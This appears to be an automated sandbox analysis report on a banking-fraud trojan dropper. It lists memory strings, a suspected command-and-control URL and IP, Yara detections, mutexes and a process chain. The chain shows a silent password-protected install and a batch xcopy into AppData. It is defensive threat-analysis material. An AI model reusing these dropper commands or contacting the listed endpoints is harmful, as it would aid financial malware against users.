                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b667
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66G
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Q
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Y
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66c
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66e
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66h
                          Source: ast.exe, 0000000A.00000003.2888461757.0000000006091000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66ln241119_8036.log
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66m
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66u
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66w
                          Source: ast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.phpy
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-VCJTB.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/e
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types?fr
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesYfT
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesntime1
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typespeg-tu
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesw)u
                          Source: ast.exe.9.drString found in binary or memory: http://www.indyproject.org/
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000000.1712569015.0000000000401000.00000020.00000001.01000000.00000004.sdmp, wjpP1EOX0L.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                          Source: wjpP1EOX0L.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022C2000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000002.00000003.2098213335.00000000022A5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ish
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022AC000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1710614762.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1713559295.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021FD000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.000000000234D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ishAbout
                          Source: wjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021F5000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.0000000002345000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.isha
                          Source: ast.exe.9.drString found in binary or memory: http://www.openssl.org/)
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000361A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.drString found in binary or memory: http://www.openssl.org/V
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000000.1712569015.0000000000401000.00000020.00000001.01000000.00000004.sdmp, wjpP1EOX0L.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49825 version: TLS 1.2
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED

                          E-Banking Fraud

                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B8D8010
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B91ED00 appears 32 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B8F48E0 appears 32 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B9006B0 appears 180 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B9005D0 appears 213 times
                          Source: wjpP1EOX0L.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: wjpP1EOX0L.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: wjpP1EOX0L.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: wjpP1EOX0L.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002576000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs wjpP1EOX0L.exe
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FE32000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs wjpP1EOX0L.exe
                          Source: wjpP1EOX0L.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal68.troj.evad.winEXE@15/60@11/3
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslNBC07263F-BB1A-48FB-BEDA-5E5CFBC91BB8
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\3 @
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrNBC07263F-BB1A-48FB-BEDA-5E5CFBC91BB8
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470Dv6
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmpJump to behavior
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: wjpP1EOX0L.exeString found in binary or memory: /LOADINF="filename"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile read: C:\Users\user\Desktop\wjpP1EOX0L.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1mJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1mJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: msimg32.dllJump to behavior
